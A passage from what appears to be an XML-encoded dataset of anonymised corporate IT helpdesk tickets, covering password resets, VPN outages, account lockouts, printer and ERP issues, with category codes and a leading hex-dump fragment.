7019 32f0 9147 293f ^'z.w&amp;..p.2..g)?_x000a_0002a0 cb46 c296 190f b8dc b367 2c3b 421a 446a .f.......g,;b.dj_x000a_0002b0 a2cf 6f59 c08c 3797 d24a a3b1 b094 ee8b ..oy..7..j......_x000a_0002c0 2c9d 48a8 c9fc 2268 248e 0c98 8ab9 8b7a ,.h...&quot;h$......z_x000a_0002d0 2909 3da0 SID_53c 6915 737d fcd7 a61d 6f2b ).=...i.s}....o+_x000a_0002e0 5e80 7c83 d787 f3f3 8eed 5389 8e5b 3914 ^.|.......s..[9._x000a_0002f0 973f 4102 0301 0001 a321 301f 301d 0603 .?a......!0.0..._x000a_000300 551d 0e04 1604 140b f883 9b8e e6af 75a6 u.............u._x000a_000310 6e1c c1e8 d06e 215a 17f1 3130 0d06 092a n....n!z..10...*_x000a_000320 8648 86f7 0d01 010b 0500 0382 0181 0053 .h.............s_x000a_000330 1a64 b708 30ae 2aff f050 e15f 3ff6 a9d6 .d..0.*..p._?..._x000a_000340 bc28 d471 6b6f 11f5 8932 a8ee b814 d7d9 .(.qko...2......_x000a_000350 be80 787e 2SID_25 d654 4fad e4f6 cfec 7ca1 ..x~-..to.....|._x000a_000360 2e08 eed8 5c18 53cb 7bbf e8f7 0ccf d99e ....\.s.{......._x000a_000370 c4c6 2655 d30f 66ba 23e3 a049 18c6 f740 ..&amp;u..f.#..i...@_x000a_000380 f048 6ea3 3188 50e1 5c0b cd37 553b ca4e .hn.1.p.\..7u;.n_x000a_000390 f984 94d8 bb2a 7d0b 6dd5 139d f865 ef13 .....*}.m....e.._x000a_0003a0 7fd3 5dc6 e60f 8f63 4e2c 0193 e5ae 1424 ..]....cn,.....$_x000a_0003b0 1708 6991 fa2d 9e29 9d57 e98f 8ebd 7515 ..i..-.).w....u._x000a_0003c0 c168 a790 82f9 e7d4 bf63 f387 d142 07c5 .h.......c...b.._x000a_0003d0 91fd 8049 4bf4 8fba 8635 0eb9 7a9c 4884 ...ik....5..z.h._x000a_0003e0 6fc1 2774 b638 6136 16ca bfb9 0885 520b o.'t.8a6......r._x000a_0003f0 d322 7a30 c604 0d84 f3ff fd6b 15d5 8967 .&quot;z0.......k...g_x000a_000400 74ae 3723 19c4 2673 005e 9bf0 d583 dbe6 t.7#..&amp;s.^......_x000a_000410 e637 7b3b 8d8d 3714 de94 1a74 db16 5abb .7{;..7....t..z._x000a_000420 8434 783e cac7 9c76 e44c 916f 8d8a 1bba .4x&gt;...v.l.o...._x000a_000430 cd13 d60a ef36 19cf bf7b 464e 211e 0ba3 .....6...{fn!..._x000a_000440 2972 9bb2 7016 207b 04b3 65fd 9e8e 0c18 )r..p..{..e....._x000a_000450 6000 672b f5b8 86be c651 ede9 SID_290 49c2 `.g+.....q....i._x000a_000460 66aa 81bd 50e6 c96f f090 906d b59e 9f98 f...p..o...m...._x000a_000470 6b16 265f cf88 99e2 bc4d 862c e826 458d k.&amp;_.....m.,.&amp;e._x000a_000480 a89f 87a0 79c3 91bb 6a21 894d 8fb7 f084 ....y...j!.m...._x000a_000490 a5b7 75ba 0a51 b0c0 1fb0 e49f 9117 8dca ..u..q.........._x000a_0004a0 14ac bfda 04c9 d52c e301 5a2b 8f57 ad0c .......,..z+.w.._x000a_0004b0 0001 c903 0017 4104 21d8 02b7 9198 e496 ......a.!......._x000a_0004c0 a5a8 185f eb1a a86c 6342 51ca 67c4 a646 ..._...lcbq.g..f_x000a_0004d0 a0bc a8d0 ddb4 c51b 93df e501 4af2 0c48 ............j..h_x000a_0004e0 e522 eba8 d89c 25a2 d70c 4e38 cf6b 44eb .&quot;....%...n8.kd._x000a_0004f0 4c90 4926 8352 d1ba 0601 0180 67a4 40cd l.i&amp;.r......g.@._x000a_000500 878b d8f6 c37c d940 ad8c 2ce7 80f5 7764 .....|.@..,...wd_x000a_000510 f416 212b 4500 9af4 b5a9 755d f782 4059 ..!+e.....u]..@y_x000a_000520 2edb .._x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="password change "/>
    <s v="password change "/>
    <s v="okdrsinu gvfmuxdo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="personal device set-up procedure"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uiotbkhs.grymzxiq@gmail.com_x000d__x000a__x000d__x000a_team,_x000d__x000a__x000d__x000a_please send me a link to the information on how i can set up a personal tablet to receive company email through exchange server._x000d__x000a__x000d__x000a_i have the i.t. ticket completed but i understand i need to set up the tablet before i submit._x000d__x000a__x000d__x000a_best "/>
    <s v="uiotbkhs grymzxiq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="1192185 is in stock at plant_249 after finishing production at plant_248.  why isn't there a delivery created to ship this item."/>
    <s v="1192185 is in stock at plant_249 after finishing production at plant_248.  why isn't there a delivery created to ship this item to fill customer backorder?  there was previously an issue with the system automatically processing shipments as it should._x000d__x000a__x000d__x000a_"/>
    <s v="dqplrwoy cutpwjie"/>
    <x v="5"/>
  </r>
  <r>
    <s v="cannot connect to eu vpn from home. need to use it from 8am-2pm while na vpn is down"/>
    <s v="when clicking &quot;company_vpn&quot; on the vpn.company website, the new window opens to show network access. after attempting to connect i get error &quot; a connection to the remote computer could not be established, so the port used for this connection was closed&quot;"/>
    <s v="zlvafsxw dfzbsjui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi not working "/>
    <s v="wifi not working "/>
    <s v="idlupnzr nkxylwrc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access"/>
    <s v="_x000a__x000a_received from: qdtywmkv.aolijwnx@gmail.com_x000a__x000a_i have been given the &quot;to many failed attempts&quot; for logging into erp_x000a__x000a_have recently changed password checked that it was unlocked in password_management_tool and when i tried new one twice without working i tried my old password._x000a__x000a_then after not opening came the message of to many failed attempts i need access to erp._x000a__x000a_michghytuael t. hardman_x000a_maintenance supervisor_x000a_qdtywmkv.aolijwnx@gmail.com&lt;mailto:qdtywmkv.aolijwnx@gmail.com&gt;_x000a_"/>
    <s v="qdtywmkv aolijwnx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset alert from o365  for user â€¢ michghytuael.white@company.com "/>
    <s v="password reset alert from o365  for user â€¢ michghytuael.white@company.com "/>
    <s v="lhrnyktm egilutwz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ooo till friday . crm web access. unable to load page."/>
    <s v="crm web access. unable to load page."/>
    <s v="xiaurwpz hzusljmc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype audio not working"/>
    <s v="skype audio not working"/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request from o365 "/>
    <s v="password reset request from o365 "/>
    <s v="hbodpniz jvqpxohl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation request "/>
    <s v="mobile device activation request "/>
    <s v="byclpwmv esafrtbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to vpn : account locked out "/>
    <s v="not able to login to vpn : account locked out "/>
    <s v="vxzahrlc frtkpehy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad account locked out "/>
    <s v="ad account locked out "/>
    <s v="ezkgipuv ozcvnkht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer not working, pc in qa office in germany not getting connected to internet."/>
    <s v="printer not working, pc in qa office in germany not getting connected to internet._x000d__x000a__x000d__x000a_pc name : _x000d__x000a_olympus-SID_32073 _x000d__x000a__x000d__x000a_contact name : 150, 139_x000d__x000a_"/>
    <s v="lsnmoqdz jawresyp"/>
    <x v="41"/>
  </r>
  <r>
    <s v="enterprise search connector forâ€¦ is not working!!"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ucphibmr.dfvkbtsj@gmail.com_x000d__x000a__x000d__x000a_enterprise search connector forâ€¦ is not working!!_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d2050b.fa380480]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="ucphibmr dfvkbtsj"/>
    <x v="10"/>
  </r>
  <r>
    <s v="company distributor_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pnabslgh.vatpgsxn@gmail.com_x000d__x000a__x000d__x000a_hi my name is pnabslgh vatpgsxn._x000d__x000a_pls help me to use company distributor_tool_x000d__x000a__x000d__x000a__x000d__x000a_æœ¬é€šä¿¡ã¯è¨˜è¼‰ã•ã‚ŒãŸäººç‰©ã®ã¿ã‚’å¯¾è±¡ã¨ã—ã¦ä½¿ç”¨ã•ã‚Œã‚‹ã‚‚ã®ã¨ã—ã€ç‰¹æ¨©çš„ã‹ã¤æ©Ÿå¯†æƒ…å ±ã‚’å«ã¿ã€é©ç”¨ã•ã‚Œã‚‹æ³•å¾‹ã«åŸºã¥ã„ãŸæƒ…å ±é–‹ç¤ºã‹ã‚‰é™¤å¤–ã•ã‚Œã‚‹ã‚‚ã®ã¨ã—ã¾ã™ã€‚æ­£å½“ãªå—å–äººä»¥å¤–ã®ã„ã‹ãªã‚‹ç¬¬ä¸‰è€…ã«ã‚ˆã‚‹æœ¬é€šä¿¡ã®é…å¸ƒã€æµé€šã€å†è²©ã¯å›ºãç¦ã˜ã‚‰ã‚Œã¦ã„ã¾ã™ã€‚ã¾ãŸæœ¬é€šä¿¡ãŒèª¤ã£ã¦é€ä¿¡ã•ã‚ŒãŸå ´åˆã¯ã€é€ä¿¡è€…ã«é€£çµ¡ã®ä¸Šã€æœ¬é€šä¿¡ã‚’å‰Šé™¤ã—ã¦ãã ã•ã„ã€‚_x000d__x000a_[#+company/posts&gt;  [_x000d__x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="pnabslgh vatpgsxn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="an prÃ¼fen \ we_wu113 \ essa presse \ box blinkt dauerhaft \wrcktgbd wzrgyunp"/>
    <s v="an prÃ¼fen \ we_wu113 \ essa presse \ box blinkt dauerhaft \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup rechnerf fÃ¼r infostand instandsetzung \niptbwdq csenjruz"/>
    <s v="setup rechnerf fÃ¼r infostand instandsetzung \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="problem mit bildschirmschoner an den sinic-stationen \jionmpsf wnkpzcmv"/>
    <s v="problem mit bildschirmschoner an den sinic-stationen \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="externe festplatte zu verfÃ¼gung stellen \alte nobook festplatte \edspmloy fxnkzaqu"/>
    <s v="externe festplatte zu verfÃ¼gung stellen \alte nobook festplatte \edspmloy fxnkzaqu"/>
    <s v="edspmloy fxnkzaqu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit portal \ghaltiek lsuepvyx"/>
    <s v="probleme mit portal \ghaltiek lsuepvyx"/>
    <s v="ghaltiek lsuepvyx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="circuit outage:usa plant,na company-na-usa-usa-plant-static-vpn-4331-rtr02 went down at 04:22 am et on 09/02."/>
    <s v="what type of outage:  ____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __slo site_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______04:22 am et on 09/02.______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_yes___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __primary is active______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ___na________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  __na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mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="interface: fastethernet0/27  vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03 is down."/>
    <s v="interface: fastethernet0/27 Â· vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is down "/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="3"/>
  </r>
  <r>
    <s v="i get warehouse_toolmails meant for efbwiadp dicafxhv "/>
    <s v="please check why warehouse_toolmails for efbwiadp dicafxhv are getting emailed to me. trurthyuft has not received any of the emails. please check attachments."/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="6"/>
  </r>
  <r>
    <s v="password_management_tool password manager login issue"/>
    <s v="+76_x000a_summary:_x000a_i tried use password_management_tool manager to change password_x000a_ _x000a_when i enter new paasword it prompts  me no activex_x000a_ _x000a_when i click install it give me error"/>
    <s v="gimkwnvs wpjmocut"/>
    <x v="0"/>
  </r>
  <r>
    <s v="configure shared mailbox"/>
    <s v="need to add two mailboxes to outlook (still working with outlook 2010) .companyfoundation@kcompany.com and .relations@company.com but doesn't work."/>
    <s v="fmjeaoih ndyezlkb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype add in is not showing up in outlook."/>
    <s v="skype add in is not showing up in outlook. _x000d__x000a_also when manually activated."/>
    <s v="ipmlkwce plhtfsqo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation ; company provided."/>
    <s v="mobile device activation ; company provided."/>
    <s v="btvmxdfc yfahetsc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="f drive on rqxsm004 is over 85% space consumed. space available: 3.9 gb"/>
    <s v="volume: f:\ label:dat2-rqxsm004 dc86ed35 on server: rqxsm004 is over 85% space consumed. space available: 3.9 gb"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ethernet"/>
    <s v="ethernet not working. only wi-fi."/>
    <s v="xdtiwshm ijyrtulh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç­”å¤: 35969737/2032252"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wqzarvhx.hfsojckw@gmail.com_x000d__x000a__x000d__x000a_hi, help_x000d__x000a__x000d__x000a_pls check item 20, net value in condition table is 17rmb. but shows  34rmb on the view of item overview, pls correct, "/>
    <s v="wqzarvhx hfsojckw"/>
    <x v="12"/>
  </r>
  <r>
    <s v="outlook not responding "/>
    <s v="outlook not responding "/>
    <s v="xjazwpmd sjirdnam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="adoption score card is not visible in crm dynamics  : insufficient permission to access"/>
    <s v="962_x000a_summary:adoption score card is not visible in crm dynamics _x000a__x000a_user is trying to access crm adoption card for first time."/>
    <s v="ilypdtno mkdfetuq"/>
    <x v="22"/>
  </r>
  <r>
    <s v="SID_1 is not working."/>
    <s v="SID_1 is not working. _x000d__x000a_error  : no connection to server."/>
    <s v="qavdrpfu ylfwnbkr"/>
    <x v="13"/>
  </r>
  <r>
    <s v="na remote is not working"/>
    <s v="[â€Ž9/â€Ž2/â€Ž2016 12:06 pm] mhfjudahdyue rfgrhtdy: _x000a_hi manjgtiry_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:06 pm] dwfiykeo argtxmvcumar3: _x000a_hello_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:06 pm] mhfjudahdyue rfgrhtdy: _x000a_na remote is not working_x000a_can you verify_x000a_eu remote is working_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:07 pm] dwfiykeo argtxmvcumar3: _x000a_ok_x000a_let me check_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:09 pm] mhfjudahdyue rfgrhtdy: _x000a_ok_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:10 pm] dwfiykeo argtxmvcumar3: _x000a_are you getting some error ?_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:10 pm] mhfjudahdyue rfgrhtdy: _x000a_not able to connect vpn_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:11 pm] dwfiykeo argtxmvcumar3: _x000a_ok_x000a_let me create a ticket_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:13 pm] dwfiykeo argtxmvcumar3: _x000a__x000a_can you try if it is working ?_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:13 pm] mhfjudahdyue rfgrhtdy: _x000a_eu is working_x000a_i am on eu now_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:13 pm] dwfiykeo argtxmvcumar3: _x000a_ok_x000a_this is new asia vpn remote_x000a_if you have time just try it _x000a_[â€Ž9/â€Ž2/â€Ž2016 12:15 pm] mhfjudahdyue rfgrhtdy: _x000a_sure_x000a_[â€Ž9/â€Ž2/â€Ž2016 12:16 pm] dwfiykeo argtxmvcumar3: _x000a_"/>
    <s v="jvhqyamt wodzrcjg"/>
    <x v="19"/>
  </r>
  <r>
    <s v="sto 5019179518 is for 2 pcs of material 6316883. delivery 9169190868 created for 1 pc."/>
    <s v="debbie smhdyhti gets an error message "/>
    <s v="rugphfdi trlshejc"/>
    <x v="29"/>
  </r>
  <r>
    <s v="display an festtelefon der nummer 311 im cvd anlagenbereich defekt. telefon bitte erneuern."/>
    <s v="display an festtelefon der nummer 311 im cvd anlagenbereich defekt. telefon bitte erneuern."/>
    <s v="pjrcbhln qznblemc"/>
    <x v="41"/>
  </r>
  <r>
    <s v="could find old email from year 2012 in microsoft outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wsimcqzt.xvwzbdhq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_only till february 2015  ?_x000d__x000a__x000d__x000a_[cid:image001.png@01d204f3.6ecda2a0]_x000d__x000a__x000d__x000a_mit freundlichen grugermany / with best "/>
    <s v="wsimcqzt xvwzbdhq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation successfully done."/>
    <s v="mobile device activation successfully done."/>
    <s v="gwptzvxm rhozsfty"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request for stop/ delete the dtp job in SID_37"/>
    <s v="hi team basis,_x000d__x000a__x000d__x000a_please stop/ delete the job bidengineering_tool_2619536_1 in SID_37 system._x000d__x000a__x000d__x000a_the job was triggered to uacyltoe hxgaycze the value of one of the complaint cube transaction in bw system. as the result is found, hence please stop the respective job._x000d__x000a__x000d__x000a_email is sent to team._x000d__x000a__x000d__x000a_best "/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="13"/>
  </r>
  <r>
    <s v="not able to connect to  outlook - getting security alert about security certificate"/>
    <s v="_x000d__x000a_not able to connect to out look- please see the screen shot and do needful."/>
    <s v="xyodfqhk wgymhail"/>
    <x v="33"/>
  </r>
  <r>
    <s v="sd_sales_order* jobs abended in job_scheduler due to &quot;logon of user coferte in client 120 failed when starting a step&quot;"/>
    <s v="sd_sales_order* jobs abended in job_scheduler due to &quot;logon of user coferte in client 120 failed when starting a step&quot;"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="4"/>
  </r>
  <r>
    <s v="access to run-books (dot net and plm solutioning) "/>
    <s v="hi,_x000a__x000a_kindly usa pagthyuathy afghtyjith , userid &quot;vvdfgtyuji&quot; access to run-books(dot net and plm solutioning)._x000a__x000a_"/>
    <s v="ongumpdz pjkrfmbc"/>
    <x v="15"/>
  </r>
  <r>
    <s v="stock issue for mm 1113198"/>
    <s v="hello christgrytoph_x000d__x000a__x000d__x000a_this kind situation came up again, i'm wondering, is it a good way to run the dn? _x000d__x000a_please see the screen below, "/>
    <s v="tckyrinp vbzqslco"/>
    <x v="29"/>
  </r>
  <r>
    <s v="material issue"/>
    <s v="now, the quantity changed to 3pcs, seems not solved yet._x000a_ _x000a__x000a_rofgtyger liugh _x000a__x000a_from: judthti zhu _x000a_sent: friday, august 26, 2016 2:48 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: rofgtyger liugh _x000a_subject: material issue_x000a__x000a_dear teamï¼Œ_x000a_we once shipped a subcontract order on jul 21th,_x000a_po#5616690206_x000a_rough material#2224208*10pcs_x000a_movement type:541_x000a_but its corresponding end product mm#6004236 still exists in erp,pls. help to check the root cause,thx!_x000a_ _x000a_ _x000a__x000a__x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="29"/>
  </r>
  <r>
    <s v="request in behalf of jvxtfhkg heptuizn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ecwtrjnq.jpecxuty@gmail.com_x000d__x000a__x000d__x000a_hello collegues,_x000d__x000a__x000d__x000a_jvxtfhkg heptuizns iphone calendar is only synchronizing in one direction._x000d__x000a__x000d__x000a_if he does a calendar entry in his outlook on the computer, it synchs tot he iphone calendar,_x000d__x000a_if he enters one on the iphone, it is not synchronized to the outlook._x000d__x000a__x000d__x000a_would you please be so kind and help us regarding this issue._x000d__x000a__x000d__x000a_many "/>
    <s v="ecwtrjnq jpecxuty"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pagthyuathy afghtyjith - access to dot kt folders (\\HostName_29) "/>
    <s v="hi,_x000d__x000a__x000d__x000a_kindly usa access to  pagthyuathy afghtyjith  our new intern of dot net team._x000d__x000a_her userid is &quot;vvdfgtyuji&quot;._x000d__x000a__x000d__x000a_"/>
    <s v="ongumpdz pjkrfmbc"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job SID_30hotf failed in job_scheduler at: 09/02/2016 00:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_30hotf failed in job_scheduler at: 09/02/2016 00:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset passwords for qycgdfhz iqshzdru using password_management_tool password reset."/>
    <s v="the"/>
    <s v="qycgdfhz iqshzdru"/>
    <x v="16"/>
  </r>
  <r>
    <s v="access for tablearu-top customers"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ufesrwmz.egujslwx@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_to prepare for monthly inf mbr report, i need access to run top customer &amp;end markhtyets in reporting_tool,  it will be put in month inf mbr report. it is quite urgent now._x000d__x000a_#/site/certified_content/views/mbrreporting_engineering_tool/topcustomersendmarkhtyets?:iid=1&lt;_x000d__x000a__x000d__x000a_"/>
    <s v="ufesrwmz egujslwx"/>
    <x v="8"/>
  </r>
  <r>
    <s v="configure e6430 unit for standard login for product videos display"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kbclinop.vsczklfp@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_for your information and reference only.  i have requested help from it to set up a standard login for a spare laptop for company product videos to be display on tv â€“ at our office main entrance._x000d__x000a_configuration completed by sridhar._x000d__x000a__x000d__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="18"/>
  </r>
  <r>
    <s v="printer problem / issue information "/>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prtor00u on HostName_1224 - prtor003 on HostName_1224 - prtor0040 on HostName_1224 _x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?  will not print because drviers need updated - i updated the drivers but it states error processing _x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc)  all_x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)   outlook_x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? no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mfixrouy dyifhcjt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="viyglzfo ajtfzpkb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_38hotf failed in job_scheduler at: 09/01/2016 22:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_38hotf failed in job_scheduler at: 09/01/2016 22:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_38hotf failed in job_scheduler at: 09/01/2016 22:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_38hotf failed in job_scheduler at: 09/01/2016 22:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ie æµè§ˆå™¨ä¸»é¡µè¢«æ›´æ”¹ä¸ºé…’åº—ç½‘ç«™åœ°å€ã€‚"/>
    <s v="ie æµè§ˆå™¨ä¸»é¡µè¢«æ›´æ”¹ä¸ºé…’åº—ç½‘ç«™åœ°å€ã€‚"/>
    <s v="kcldufqe xghvrzoi"/>
    <x v="31"/>
  </r>
  <r>
    <s v="recall:  ticket_no1547270 - i need to request access to co02 - change production order in cgo1 and plant_118."/>
    <s v="_x000d__x000a__x000d__x000a_received from: riqmdnzs.mtlghwex@gmail.com_x000d__x000a__x000d__x000a_riqmdnzs mtlghwex would like to recall the message, &quot; ticket_no1547270 - i need to request access to co02 - change production order in cgo1 and plant_118.&quot;._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="riqmdnzs mtlghwex"/>
    <x v="19"/>
  </r>
  <r>
    <s v="é›»è…¦å‡ºç¾è—å±,ç„¡æ³•é–‹æ©Ÿ"/>
    <s v="é€£vpnæ™‚,ç„¡æ³•é€£ä¸Šå¾Œ,é‡è©¦å¾Œ,çªç„¶å‡ºç¾è—å±,ç„¡æ³•é–‹æ©Ÿ"/>
    <s v="zhpwcdea cboefuis"/>
    <x v="31"/>
  </r>
  <r>
    <s v="spam"/>
    <s v="-----original message-----_x000d__x000a_from: nwfodmhc exurcwkm _x000d__x000a_sent: friday, september 02, 2016 7:30 am_x000d__x000a_to: umzcxfah aoshpjiu_x000d__x000a_subject: re: new warehouse_toolmail from (806) 290-5218 at 7:35 am_x000d__x000a__x000d__x000a_hi marry,_x000d__x000a__x000d__x000a_it looks like a spam mail. you can go ahead and delete it._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="umzcxfah aoshpjiu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no access to impact award hub"/>
    <s v="the users do not have accees to impact award hub:  parfgtkym, leegtysm"/>
    <s v="dbwkxalj cnhgysju"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2063d failed in job_scheduler at: 09/01/2016 18:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063d failed in job_scheduler at: 09/01/2016 18:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="llvw8411311  shop floor / print station  "/>
    <s v="noise coming from cpu that sounds like a cooling fan or a hard drive going bad.  machine located by the ultra's and wendt._x000a_contact # 615  "/>
    <s v="jiclynfv gwvzxdcj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="rebate agreements 92 will not create partial settlement"/>
    <s v="rebate agreements 92 will not create a partial settlement with transaction vb(7 _x000d__x000a__x000d__x000a_i have confirmed with agreement 92 specifically that there were sales during the month of august.  other agreements are working to create the credit without fail.  please advise what could be the cause and steps to correct.  please also note this same process worked to generate the july documents ."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="doing engineering_tool advance search materials out of the group i select come up in results"/>
    <s v="i picked titanium tial 6 4v but then p5 materials come up in results along with titanium, and s3 materials. i also had the kcu40 grade in the grade field, as i was doing a search for drilling"/>
    <s v="kgqpwvzu rkexzwlh"/>
    <x v="25"/>
  </r>
  <r>
    <s v="all my files in collaboration_platform have dierppeared!"/>
    <s v="ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_rakthyesh ramdntythanjesh_x000a_ hi craigfgh_x000a_arjpdohf mrqwdtil_x000a_ hi_x000a_rakthyesh ramdntythanjesh_x000a_ "/>
    <s v="arjpdohf mrqwdtil"/>
    <x v="15"/>
  </r>
  <r>
    <s v="re: sql quote - company internal project (agathon machines)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xzwlnbfo.plstfydx@gmail.com_x000d__x000a__x000d__x000a_hi...can i get an update on this?_x000d__x000a__x000d__x000a_"/>
    <s v="xzwlnbfo plstfydx"/>
    <x v="52"/>
  </r>
  <r>
    <s v="when trying to refresh a report, i am getting a pop up that says hana odbc driver not found."/>
    <s v="when trying to refresh a report, i am getting a pop up that says hana odbc driver not found."/>
    <s v="muywpnof prtikusy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: secondary node down on company-na-usa-usa-dmvpn-1921-rtr01.company.com since at 3:04 pm et on 09/01 s"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____3:04 pm et on 09/01__________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __no_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x v="7"/>
  </r>
  <r>
    <s v="mapping printers "/>
    <s v="mapping printers "/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dsw in22210104"/>
